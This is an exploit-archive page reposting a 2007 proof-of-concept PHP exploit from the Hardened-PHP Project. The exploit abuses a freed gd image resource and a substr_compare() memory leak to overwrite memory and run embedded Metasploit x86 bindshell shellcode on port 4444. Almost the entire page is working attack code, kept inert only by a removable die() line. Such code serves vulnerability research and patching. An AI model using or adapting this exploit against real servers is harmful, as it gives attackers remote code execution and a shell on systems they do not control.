Home / exploitsPDF  

MOPB-already.txt

Posted on 21 March 2007

<?php //////////////////////////////////////////////////////////////////////// // _ _ _ _ ___ _ _ ___ // // | || | __ _ _ _ __| | ___ _ _ ___ __| | ___ | _ | || || _ // // | __ |/ _` || '_|/ _` |/ -_)| ' / -_)/ _` ||___|| _/| __ || _/ // // |_||_|\__,_||_| \__,_|\___||_||_|\___|\__,_| |_| |_||_||_| // // // // Proof of concept code from the Hardened-PHP Project // // (C) Copyright 2007 Stefan Esser // // // //////////////////////////////////////////////////////////////////////// // PHP gd already freed resource usage exploit // //////////////////////////////////////////////////////////////////////// // This is meant as a protection against remote file inclusion. die("REMOVE THIS LINE"); // linux x86 bindshell on port 4444 from Metasploit $shellcode = "x29xc9x83xe9xebxd9xeexd9x74x24xf4x5bx81x73x13x46". "x32x3cxe5x83xebxfcxe2xf4x77xe9x6fxa6x15x58x3ex8f". "x20x6axa5x6cxa7xffxbcx73x05x60x5ax8dx57x6ex5axb6". "xcfxd3x56x83x1ex62x6dxb3xcfxd3xf1x65xf6x54xedx06". "x8bxb2x6exb7x10x71xb5x04xf6x54xf1x65xd5x58x3exbc". "xf6x0dxf1x65x0fx4bxc5x55x4dx60x54xcax69x41x54x8d". "x69x50x55x8bxcfxd1x6exb6xcfxd3xf1x65"; // Offsets used for the overwrite (will be overwritten by findOffsets() $offset_1 = 0x55555555; $offset_2 = 0x66666666; findOffsets(); // Comment out if you want to just test the crash class dummyclass { } function myErrorHandler() { imagedestroy($GLOBALS['img']); // Clipping $GLOBALS['x'] = str_repeat(chr(0), 7311); $GLOBALS['x'][7310] = chr(0x00); $GLOBALS['x'][7309] = chr(0x01); $GLOBALS['x'][7308] = chr(0x00); $GLOBALS['x'][7307] = chr(0x7f); $GLOBALS['x'][7306] = chr(0xff); $GLOBALS['x'][7305] = chr(0xff); $GLOBALS['x'][7304] = chr(0xff); $GLOBALS['x'][7303] = chr(0); $GLOBALS['x'][7302] = chr(0); $GLOBALS['x'][7301] = chr(0); $GLOBALS['x'][7300] = chr(0); $GLOBALS['x'][7299] = chr(0x80); $GLOBALS['x'][7298] = chr(0); $GLOBALS['x'][7297] = chr(0); $GLOBALS['x'][7296] = chr(0); // True Color Image $GLOBALS['x'][0x1c38] = chr(1); // True Color Pixelmap (1st entry must be 0) $GLOBALS['x'][0x1c3c] = chr(0x08); $GLOBALS['x'][0x1c3d] = chr(0x80); $GLOBALS['x'][0x1c3e] = chr(0x04); $GLOBALS['x'][0x1c3f] = chr(0x08); return true; } function poke($addr, $value) { $GLOBALS['img'] = imagecreate(1, 1); imagesetpixel($GLOBALS['img'], $addr >> 2, new dummyclass(), $value); } function peek($addr) { $GLOBALS['img'] = imagecreate(1, 1); return imagecolorat($GLOBALS['img'], $addr >> 2, new dummyclass()); } printf("Using offsets %08x and %08x ", $offset_1, $offset_2); error_reporting(E_ALL); set_error_handler("myErrorHandler"); poke($offset_2, $offset_1); unset($d); // This function uses the substr_compare() vulnerability // to get the offsets. function findOffsets() { global $offset_1, $offset_2, $shellcode; // We need to NOT clear these variables, // otherwise the heap is too segmented global $memdump, $d, $arr; $sizeofHashtable = 39; $maxlong = 0x7fffffff; // Signature of a big endian Hashtable of size 256 with 1 element $search = "x00x01x00x00xffx00x00x00x01x00x00x00"; $memdump = str_repeat("A", 18192); for ($i=0; $i<400; $i++) { $d[$i]=array(); } unset($d[350]); $x = str_repeat("x01", $sizeofHashtable); unset($d[351]); unset($d[352]); $arr = array(); for ($i=0; $i<129; $i++) { $arr[$i] = 1; } $arr[$shellcode] = 1; for ($i=0; $i<129; $i++) { unset($arr[$i]); } // If the libc memcmp leaks the information use it // otherwise we only get a case insensitive memdump $b = substr_compare(chr(65),chr(0),0,1,false) != 65; for ($i=0; $i<18192; $i++) { $y = substr_compare($x, chr(0), $i+1, $maxlong, $b); $Y = substr_compare($x, chr(1), $i+1, $maxlong, $b); if ($y-$Y == 1 || $Y-$y==1){ $y = chr($y); if ($b && strtoupper($y)!=$y) { if (substr_compare($x, $y, $i+1, $maxlong, false)==-1) { $y = strtoupper($y); } } $memdump[$i] = $y; } else { $y = substr_compare($x, chr(1), $i+1, $maxlong, $b); $Y = substr_compare($x, chr(2), $i+1, $maxlong, $b); if ($y-$Y != 1 && $Y-$y!=1){ $memdump[$i] = chr(1); } else { $memdump[$i] = chr(0); } } } // Search shellcode and hashtable and calculate memory address $pos_shellcode = strpos($memdump, $shellcode); $pos_hashtable = strpos($memdump, $search); if ($pos_shellcode == 0 || $pos_hashtable == 0) { die ("Unable to find offsets"); } $addr = substr($memdump, $pos_hashtable+6*4, 4); $addr = unpack("L", $addr); // Fill in both offsets $offset_1 = $addr[1] + 32; $offset_2 = $offset_1 - $pos_shellcode + $pos_hashtable + 8*4; } ?>

 

TOP